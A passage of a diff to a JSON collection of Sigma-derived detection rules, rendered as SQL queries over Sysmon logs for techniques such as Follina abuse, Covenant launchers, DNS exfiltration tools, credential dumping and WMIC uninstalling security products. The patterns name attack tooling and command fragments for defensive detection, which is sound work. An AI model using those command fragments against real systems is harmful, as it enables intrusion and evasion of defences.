used by EfsPotato)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1110.002" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Tools that use similar command line flags and values" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\hashcat.exe' ESCAPE '\\' OR (CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-m 1000 %' ESCAPE '\\' AND CommandLine LIKE '%-r %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%.exe whoami%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_hashcat.yml" + "filename": "proc_creation_win_susp_whoami_as_param.yml" }, { - "title": "LSA PPL Protection Disabled Via Reg.EXE", - "id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", + "title": "Suspicious Serv-U Process Pattern", + "id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", "status": "experimental", - "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process", + "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.010" + "attack.credential_access", + "attack.t1555", + "cve.2021.35211" ], "falsepositives": [ - "Unlikely" + "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND CommandLine 
LIKE '% /v RunAsPPL %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Serv-U.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml" + "filename": "proc_creation_win_servu_susp_child_process.yml" }, { - "title": "Wab/Wabmig Unusual Parent Or Child Processes", - "id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "title": "Execute Pcwrun.EXE To Leverage Follina", + "id": "6004abd0-afa4-4557-ba90-49d172e0a299", "status": "experimental", - "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", + "attack.t1218", "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR 
ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (Image LIKE '%\\\\wab.exe' ESCAPE '\\' OR Image LIKE '%\\\\wabmig.exe' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wabmig.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\pcwrun.exe' ESCAPE '\\' AND CommandLine LIKE '%../%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wab_unusual_parents.yml" + "filename": "proc_creation_win_lolbin_pcwrun_follina.yml" }, { - "title": "Disable Windows IIS HTTP Logging", - "id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", - "status": "experimental", - "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", - "author": "frack113", + "title": "HackTool - Covenant PowerShell Launcher", + "id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", + "status": "test", + "description": "Detects suspicious command lines used in Covenant luanchers", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1562.002" - ], - "falsepositives": [ - "Unknown" + "attack.t1059.001", + "attack.t1564.003" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:httplogging%' ESCAPE '\\' AND CommandLine LIKE '%dontLog:true%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%-Sta%' ESCAPE '\\' AND CommandLine LIKE '%-Nop%' ESCAPE '\\' AND CommandLine LIKE '%-Window%' ESCAPE '\\' AND CommandLine LIKE '%Hidden%' ESCAPE '\\' AND (CommandLine LIKE '%-Command%' ESCAPE '\\' OR CommandLine 
LIKE '%-EncodedCommand%' ESCAPE '\\')) OR (CommandLine LIKE '%sv o (New-Object IO.MemorySteam);sv d %' ESCAPE '\\' OR CommandLine LIKE '%mshta file.hta%' ESCAPE '\\' OR CommandLine LIKE '%GruntHTTP%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand cwB2ACAAbwAgA%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_iis_appcmd_http_logging.yml" + "filename": "proc_creation_win_hktl_covenant.yml" }, { - "title": "Potential LethalHTA Technique Execution", - "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "title": "Suspicious Splwow64 Without Params", + "id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", "status": "test", - "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spwaned by an \"svchost.exe\" process", - "author": "Markus Neis", + "description": "Detects suspicious Splwow64.exe process without any command line parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.005" + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\mshta.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\splwow64.exe' ESCAPE '\\' AND CommandLine LIKE '%splwow64.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_mshta_lethalhta_technique.yml" + "filename": "proc_creation_win_splwow64_cli_anomaly.yml" }, { - "title": "Suspicious Schtasks Schedule Types", - "id": "24c8392b-aa3c-46b7-a545-43f71657fe98", + "title": "Suspicious Shells Spawned by Java", + "id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", "status": "experimental", - "description": "Detects scheduled task creations or modification on a suspicious schedule type", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious shell spawned from 
Java host process (e.g. log4j exploitation)", + "author": "Andreas Hunkeler (@Karneades), Florian Roth", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Legitimate processes that run at logon. Filter according to your environment" + "Legitimate calls to system binaries", + "Company specific internal usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE 
'\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_schedule_type.yml" + "filename": "proc_creation_win_java_susp_child_process.yml" }, { - "title": "DNS Exfiltration and Tunneling Tools Execution", - "id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", + "title": "MpiExec Lolbin", + "id": "729ce0ea-5d8f-4769-9762-e35de441586d", "status": "test", - "description": "Well-known DNS Exfiltration tools execution", - "author": "Daniil Yugoslavskiy, oscd.community", + "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1132.001" + "attack.execution", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\iodine.exe' ESCAPE '\\' OR Image LIKE '%\\\\dnscat2%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mpiexec.exe' ESCAPE '\\' OR Imphash = 'd8b52ef6aaa3a81501bdfff9dbb96217' OR Hashes LIKE '%IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217%' ESCAPE '\\') AND (CommandLine LIKE '% /n 1 %' ESCAPE '\\' OR CommandLine LIKE '% -n 1 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml" + "filename": "proc_creation_win_lolbin_mpiexec.yml" }, { - "title": "File With Suspicious Extension Downloaded Via Bitsadmin", - "id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", + "title": 
"Potential Tampering With RDP Related Registry Keys Via Reg.EXE", + "id": "0d5675be-bc88-4172-86d3-1e96a4476536", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", + "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.lateral_movement", + "attack.t1021.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.asax%' ESCAPE '\\' OR CommandLine LIKE '%.ashx%' ESCAPE '\\' OR CommandLine LIKE '%.asmx%' ESCAPE '\\' OR CommandLine LIKE '%.asp%' ESCAPE '\\' OR CommandLine LIKE '%.aspx%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cfm%' ESCAPE '\\' OR CommandLine LIKE '%.cgi%' ESCAPE '\\' OR CommandLine LIKE '%.chm%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jsp%' ESCAPE '\\' OR CommandLine LIKE '%.jspx%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.psm1%' ESCAPE '\\' OR CommandLine LIKE '%.scf%' ESCAPE '\\' OR CommandLine LIKE '%.sct%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\' OR CommandLine LIKE 
'%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.war%' ESCAPE '\\' OR CommandLine LIKE '%.wsf%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.rar%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\Terminal Server%' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD%' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')) AND ((CommandLine LIKE '%Licensing Core%' ESCAPE '\\' AND CommandLine LIKE '%EnableConcurrentSessions%' ESCAPE '\\') OR (CommandLine LIKE '%WinStations\\\\RDP-Tcp%' ESCAPE '\\' OR CommandLine LIKE '%MaxInstanceCount%' ESCAPE '\\' OR CommandLine LIKE '%fEnableWinStation%' ESCAPE '\\' OR CommandLine LIKE '%TSUserEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSAppCompat%' ESCAPE '\\' OR CommandLine LIKE '%IdleWinStationPoolCount%' ESCAPE '\\' OR CommandLine LIKE '%TSAdvertise%' ESCAPE '\\' OR CommandLine LIKE '%AllowTSConnections%' ESCAPE '\\' OR CommandLine LIKE '%fSingleSessionPerUser%' ESCAPE '\\' OR CommandLine LIKE '%fDenyTSConnections%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml" + "filename": "proc_creation_win_reg_rdp_keys_tamper.yml" }, { - "title": "Logon Scripts (UserInitMprLogonScript)", - "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", + "title": "Regsvr32 Flags Anomaly", + "id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", "status": "test", - "description": "Detects creation or execution of UserInitMprLogonScript persistence method", - "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", + "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without 
using a /n flag at the same time", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1037.001", - "attack.persistence" + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ - "Exclude legitimate logon scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%UserInitMprLogonScript%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%netlogon%.bat%' ESCAPE '\\' OR CommandLine LIKE '%UsrLogon.cmd%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\WINDOWS\\\\Explorer.EXE%' ESCAPE '\\') OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\proquota.exe' ESCAPE '\\' OR Image LIKE '%\\\\Citrix\\\\System32\\\\icast.exe' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '% /i:%' ESCAPE '\\') AND NOT (CommandLine LIKE '% /n %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_persistence_userinitmprlogonscript.yml" + "filename": "proc_creation_win_regsvr32_flags_anomaly.yml" }, { - "title": "VMToolsd Suspicious Child Process", - "id": "5687f942-867b-4578-ade7-1e341c46e99a", + "title": "Regsvr32 Spawning Explorer", + "id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", "status": "experimental", - "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", - "author": "behops, Bhabesh Raj", + "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", + "author": "elhoim", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1059" + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ - "Legitimate use by administrator" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'RUNDLL32.EXE', 'REGSVR32.EXE', 'wscript.exe', 'cscript.exe'))) AND NOT ((CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweron-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweroff-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\resume-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\suspend-vm-default.bat%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" + "filename": "proc_creation_win_regsvr32_spawn_explorer.yml" }, { - "title": "Wusa Extracting Cab Files From Suspicious Paths", - "id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", - "status": "experimental", - "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Tampering With Security Products Via WMIC", + "id": "847d5ff3-8a31-4737-a970-aeae8fe21765", + "status": "test", + "description": "Detects uninstallation or termination of security products using the WMIC utility", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + 
"attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administration" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%product where %' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/nointeractive%' ESCAPE '\\') OR (CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%caption like %' ESCAPE '\\' AND (CommandLine LIKE '%call delete%' ESCAPE '\\' OR CommandLine LIKE '%call terminate%' ESCAPE '\\')) OR (CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%where %' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%carbon\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%cylance\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%endpoint\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%eset\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%malware\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Sophos\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%symantec\\%%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG %' ESCAPE '\\' OR CommandLine LIKE '%Carbon Black%' ESCAPE '\\' OR CommandLine LIKE '%CarbonBlack%' ESCAPE '\\' OR CommandLine LIKE '%Cb Defense Sensor 64-bit%' ESCAPE '\\' OR CommandLine LIKE '%Crowdstrike Sensor%' ESCAPE '\\' OR CommandLine LIKE 
'%Cylance %' ESCAPE '\\' OR CommandLine LIKE '%Dell Threat Defense%' ESCAPE '\\' OR CommandLine LIKE '%DLP Endpoint%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Detection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Protection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Security%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Sensor%' ESCAPE '\\' OR CommandLine LIKE '%ESET File Security%' ESCAPE '\\' OR CommandLine LIKE '%LogRhythm System Monitor Service%' ESCAPE '\\' OR CommandLine LIKE '%Malwarebytes%' ESCAPE '\\' OR CommandLine LIKE '%McAfee Agent%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft Security Client%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Anti-Virus%' ESCAPE '\\' OR CommandLine LIKE '%Sophos AutoUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Credential Store%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Console%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Database%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Server%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Remote Management System%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Update Manager%' ESCAPE '\\' OR CommandLine LIKE '%Threat Protection%' ESCAPE '\\' OR CommandLine LIKE '%VirusScan%' ESCAPE '\\' OR CommandLine LIKE '%Webroot SecureAnywhere%' ESCAPE '\\' OR CommandLine LIKE '%Windows Defender%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" + "filename": "proc_creation_win_wmic_uninstall_security_products.yml" }, { - "title": "Service DACL Abuse To Hide Services Via Sc.EXE", - "id": "a537cfc3-4297-4789-92b5-345bfd845ad0", + "title": "Renamed Sysinternals Sdelete Execution", + "id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", "status": "experimental", - "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects the use of a renamed 
SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.impact", + "attack.t1485" + ], + "falsepositives": [ + "System administrator usage" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'sdelete.exe' AND NOT ((Image LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete64.exe' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml" + }, + { + "title": "Renamed CreateDump Utility Execution", + "id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", + "status": "experimental", + "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Command lines that use the same flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\' OR (CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -f %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') OR (CommandLine LIKE '% --full %' ESCAPE '\\' AND CommandLine LIKE '% --name %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\createdump.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_sdset_hide_sevices.yml" + "filename": 
"proc_creation_win_renamed_createdump.yml" }, { - "title": "Suspicious Rundll32 Execution With Image Extension", - "id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", + "title": "Disabled RestrictedAdminMode For RDS - ProcCreation", + "id": "28ac00d6-22d9-4a3c-927f-bbd770104573", "status": "experimental", - "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", - "author": "Hieu Tran", + "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 